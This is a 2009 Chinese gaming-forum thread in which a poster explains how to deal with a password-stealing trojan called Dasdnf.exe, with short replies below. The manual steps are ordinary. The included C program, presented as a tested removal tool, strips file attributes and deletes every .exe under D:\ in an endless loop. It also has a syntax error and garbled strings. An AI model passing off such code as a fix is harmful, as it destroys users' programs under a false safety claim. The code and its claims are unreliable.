教大家处理一个现在DNF外挂最猖狂的盗号木马 一个IE 虚拟内存 盗号修改注册表 人人都能做小白

社区服务
高级搜索
猴岛论坛DNF地下城与勇士教大家处理一个现在DNF外挂最猖狂的盗号木马 一个IE 虚拟内存 盗号修改注册表 人人都能做小白
发帖 回复
倒序阅读 最近浏览的帖子最近浏览的版块
5个回复

教大家处理一个现在DNF外挂最猖狂的盗号木马 一个IE 虚拟内存 盗号修改注册表 人人都能做小白

楼层直达
lfjsnd

ZxID:1362057

等级: 上等兵
举报 只看楼主 使用道具 楼主   发表于: 2009-01-09 0
这个盗号木马 使用的名称叫做Dasdnf.exe

是一个非常毒的 东西  它会毙掉 你的  杀毒软件 防火墙  以及360保险箱 还能创造机器虚拟内存不够

还会把你的文本档案 改成这个毒 你就开不开文本了

你双击文本 启动的还是这个病毒 ```      很危险 很盗号

首先打开任务管理器  Ctrl+alt+小键盘上的点 .  (废话)

在进程中找到 Dasdnf.exe    先关闭它 

再随意找一个文本档案 (笔记本) 右键 属性

(示例)文本类型:文本档案

        文本类型:Dasdnf                  更改

点那个更改 可以改成 记事本 或者 笔记本  (觉得记事本好  方便快捷)

然后在点 打开--- 搜索 -----  搜索Dasdnf.exe 

如果没有就搜索Dasdnf

如果都没有就没办法了      只能开机就把他取消

我把这个办法 用 TEASLL  编程  在我本机上 CLOAA了一下

得出了一个编程  测试是正确的

*/
#include <stdio.h>
#include <io.h>
#include <string.h>
#include <direct.h>
#include <conio.h>
#include <stdlib.h>

#define FILE_ATTRIBUTE_DIRECTORY 0x00000010
#define FILE_ATTRIBUTE_FILE 0x00000020

void    DeleteFile(char *fname){
    char *p;
    // Dasdnf.exe sft
    p = strstr(fname,".exe");
    if((size_t)(p - fname ) == strlen(fname) - 4){
        printf("ccahs %s\n",fname);
        if(remove(fname))
            printf(sft: %s clood !\n",fname);
        else           
            printf("sft: %snots\n",fname);
    }
}

char    cmd[_MAX_PATH];
void    MyDeleteFile(){
    struct    _finddata_t  FileInfo;
    long    lHandle = 0L;

    if((lHandle = _findfirst("*",&FileInfo)) == -1L){
        _findclose(lHandle);
        return ;
    }
    do{
        //
        sprintf(cmd,"attrib -s -r -h %s",FileInfo.name);
        system(cmd);
        if( FileInfo.attrib == FILE_ATTRIBUTE_FILE)
            DeleteFile(FileInfo.name);
        else if(FileInfo.attrib == FILE_ATTRIBUTE_DIRECTORY){
            if( FileInfo.name[0] != '.') {
                _chdir(FileInfo.name);
                MyDeleteFile();
                _chdir("..");
            }
        }
    }while(!_findnext(lHandle,&FileInfo));
    _findclose(lHandle);
}

int    main(){
    if(_chdir("d:\\"))
        exit(1);
    while(1){
        while(!kbhit())
            MyDeleteFile();
        if(getch() == 'e')
            break;
    }
    return 0;
}

按我的办法做 应该是OK的

接下来教大家怎么处理一些更改IE的注册表  (这些注册表里也能含有Dasdnf 病毒)

先下外挂 里面总有个注册表   

右键-----编辑 

如果发现里面写的是

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="XXXX://XXX.XXXX.XXXX/"

XXX.XXXX.XXX  是网站

就证明 你这个至少是有更改网站 的功能了

目前发现了能毙掉360 和360保险箱 还能创造机器虚拟内存不够的注册表

大家小心  一旦里面有上面写的代码不要打开 一律删删删


就这么多了 希望对大家有用 祝大家 新年快乐
liuyangyu

ZxID:3056196

等级: 上尉
°(命运就象强奸一样,迩反抗不了,就要学会享受。)

举报 只看该作者 沙发   发表于: 2009-01-09 0
顶顶顶
大便的离開,!!是马桶的追求,還是肛門的不挽留。??
經典1956

ZxID:2794465

等级: 大校

举报 只看该作者 板凳   发表于: 2009-01-09 0
高手,以前种过个,但我的机器是还原的,不过还原的也不是万能的,  还是要谢谢你,这个贴收了!
q824911071

ZxID:2807087

等级: 新兵
举报 只看该作者 地板   发表于: 2009-01-09 0
SF  我的
lfjsnd

ZxID:1362057

等级: 上等兵
举报 只看该作者 4楼  发表于: 2009-01-09 0
我不像他们 需要回复才给看 但是我觉得 如果我发的对 请你们回帖支持我一下
                        你们的支持是我最大的努力
yukaiyukai2

ZxID:3649511

等级: 新兵
举报 只看该作者 5楼  发表于: 2009-01-23 0
顶了哥们!
« 返回列表
发帖 回复